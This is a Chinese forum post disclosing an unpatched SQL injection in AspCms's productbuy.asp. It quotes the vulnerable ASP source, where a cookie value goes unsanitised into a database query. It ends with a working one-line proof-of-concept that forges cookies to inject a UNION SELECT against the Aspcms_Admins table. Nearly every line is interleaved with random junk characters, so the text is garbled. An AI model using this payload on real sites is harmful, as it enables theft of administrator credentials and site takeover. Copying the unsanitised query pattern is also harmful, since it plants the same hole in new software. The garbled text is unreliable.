好久没上土司了,上来一看发现在删号名单内.....3 o W8 p4 D, g$ `+ S! o% [
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。' ?# Z" _) e% `1 ^. c7 a! O
废话不多说,看代码:
L0 e( ~% M |7 c% d
# F7 F8 u. l6 h( b8 W# B& K<%& x9 ~( Y4 W6 A1 |
L/ b( u' L) }- w2 T* j% i* \+ y9 ]
if action = "buy" then
/ C4 I: ?& r" L" Y2 z9 \5 B# V5 N O5 `+ C
addOrder()
4 [; p& F3 k; w! { B: k3 Z+ A' x% Z
) _6 n) l- V% W* s! Z' eelse
* w r& J8 U, {; J( k. d# J9 J! g. }7 g% _/ d' I3 R
echoContent()
+ x/ g" D- R% J8 a$ ]7 W, d3 J" K) S, f B$ w4 K& H( u/ g
end if6 C) V5 p. o5 k* d3 k: [) x
2 x& Z, U. K1 T6 \8 P* j5 I5 a L$ _; A$ \2 Y# ?+ N" i
- e2 O& N& }. s/ K! C4 X0 i
……略过! b2 P2 o4 O1 Z' z8 {& v4 c
& o+ Q- ^! e7 _$ t0 T
0 x* x+ l6 e& V7 Q, U5 `9 w7 N/ V& ]1 I4 T# c' O# d
Sub echoContent()- f+ d5 @, |/ X3 q
: s/ w6 Y k. }- k6 m0 ]7 d# p. K
dim id9 _7 g1 }" U. ~0 u2 S6 ~- Y
3 b; Q& Y5 V% U/ |1 q
id=getForm("id","get")' m; \, B* L+ Z" s! o5 F) M
8 g6 {! I/ C( a2 o2 e
1 G. Q& z6 P" [
, W+ F0 a& o: }6 V if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 2 H. D2 X! j8 z) z! b& f
- h; w* Q& J, E C0 ?2 D
+ u8 D2 n! x1 B. v, r) v1 S* K) t' |1 E }6 ^* N3 }
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template") t; E. j8 Y, H
! h% G" H; M- Q8 A( e
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
" ~" W1 [1 K' l3 ]2 |: A) b- l% A# b* S8 t. x0 e2 ^7 [
Dim templatePath,tempStr" P2 ~' Y# c, {* H5 b: r# i" b
$ Z' n1 B4 f+ }7 q) U2 n8 y1 h templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
8 s4 E- p, \2 y @7 d, M" R5 @9 a. k& C/ j8 }# M; k9 g1 F9 l' i
9 u7 r2 [1 t( H( Z. ^% x
7 y# M8 w! m. I) I! E- h
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
% }2 g, J1 F2 u. t7 u. C7 `1 u4 i: {7 G- U, R& F
selectproduct=rsObj(0)) X8 M6 I6 w1 u2 ?) o" b* X$ d
7 i6 a, \8 k/ ^9 A
% P1 n$ I5 X0 d) Q. N/ y2 x7 O6 |/ ^5 c0 K5 Z* v
Dim linkman,gender,phone,mobile,email,qq,address,postcode
1 m4 S: R& s% ?/ w5 p4 g* T( x/ S, X( u" j
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",07 _2 `' l# x# F9 ]; g
$ v& O2 Z/ V- {# G: [$ h if rCookie("loginstatus")=1 then
( `! ~* }8 t' ?) i3 u+ z- V
. K8 s0 n$ x* f8 Y$ p' H$ l set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")8 S; z3 Z2 |. d4 a W
5 `: C7 R3 I" V- {3 r9 O/ m. | linkman=rsObj("truename")
9 P1 B+ y+ O7 W' K. \% ]
8 C' A5 ?2 \8 V( y+ V% `6 M gender=rsObj("gender")3 I2 X5 q3 m- N4 _/ f9 A y8 o; S# P- K( i
) r7 g; g# g8 j0 {- Q: w/ @
phone=rsObj("phone")
; J# t) q3 v5 H6 @
# B1 p1 a4 }& [! D9 i mobile=rsObj("mobile")5 h) @( e; i6 v; v2 T8 h6 D
Z+ a* \0 T' ?7 p
email=rsObj("email")
) W& v" N F1 k9 a# u
U" g* k3 g4 a! W, p. z qq=rsObj("qq")' m% {7 ^' {/ S
3 F8 [* {, ~* s
address=rsObj("address")
4 L3 i. K5 f) a* Y
( M/ c: J; J( O; a" N8 A" x1 b postcode=rsObj("postcode")
0 a4 ~. H* H( r" B4 G$ o5 _; b; t& a8 \9 H, |1 S1 z
else
2 V9 u, }5 I9 @5 Q6 q6 y$ u6 j7 ~) w+ I2 z
gender=19 z Q2 ]; i( ]+ |3 U: P2 X
5 o- P/ ]% _2 L& B# R, t; Q
end if: ~# \% G: q9 e5 i* R( Q0 _
% Z8 A) i; w( }# b3 C4 v3 g rsObj.close()
2 u1 J- ]& p# i6 N R3 o/ g+ B# d$ ?& m. V' ?( m7 j; D" V" K: G3 m
( l* H3 u) l) D/ F6 Z
4 L+ g1 B- h2 M5 d/ e) T6 B# \
with templateObj 0 j3 Q4 J9 ]7 u' n4 I/ ]
! B1 p q* f( m0 ]! B
.content=loadFile(templatePath) # `7 Y, V" q, a3 G% W$ T% b( L+ q
/ W/ v) A: W6 K* V' ~& Z .parseHtml(); m& |. _0 D, }
3 K; A: d/ ~+ V .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
% G* X/ m4 V/ N, z. j0 R. R- [% o& W1 _' ?, Y1 j3 _: g
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ; o8 u; K) }7 M1 C5 z. o7 H; f; S
* Q8 a$ L! t8 W) U1 U- ? .content=replaceStr(.content,"[aspcms:gender]",gender) 2 J- t; }8 ] C& h" _
8 I. e: r2 g+ |2 O .content=replaceStr(.content,"[aspcms:phone]",phone)
0 K4 w" {% f$ J7 V: h2 O9 [# Y5 n: G8 A, ^2 j, a2 H: @9 X A& S
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
5 B& v8 y/ T4 c' [/ `' N# N; O, y* Y6 Y% g8 |, Q: U* i. M
.content=replaceStr(.content,"[aspcms:email]",email) ! {. @* k6 p" n+ Y
3 P6 g: G; r5 @6 s( w3 |3 V8 H, o s .content=replaceStr(.content,"[aspcms:qq]",qq) 7 J4 ?+ q1 C; q+ Q! U
2 e/ f# V# ?6 h: w$ l. Z) g
.content=replaceStr(.content,"[aspcms:address]",address)
, p1 S, E: G. K
" E! x; h5 S9 L' M .content=replaceStr(.content,"[aspcms:postcode]",postcode) % y7 B0 |% }$ x
8 ?/ T9 N; ~3 h- N/ D# k" N) u
.parseCommon()
2 e% h( ?7 V* t( M& _: @, h4 U, I1 G( m, ~
echo .content 2 o5 B; H% i+ E2 }
. s% I; t- S- P* J2 @
end with4 s* d6 d8 i, r. f- c+ K' x: ^2 s2 b4 `' g
% T1 {. ?) ~& X8 W; k/ B set templateobj =nothing : terminateAllObjects/ y' J0 s* J, p, L
4 O5 y0 f }+ T" u, V
End Sub
, V6 b4 V N4 B漏洞很明显,没啥好说的8 Q6 a7 l. s. q1 I/ P) K
poc:
4 d/ H+ G6 o9 e4 c' k8 W
1 {1 t/ O$ {- ujavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子8 Y# N+ C( L( P; w% u
; h* }3 }! M3 c% t1 B+ `4 p |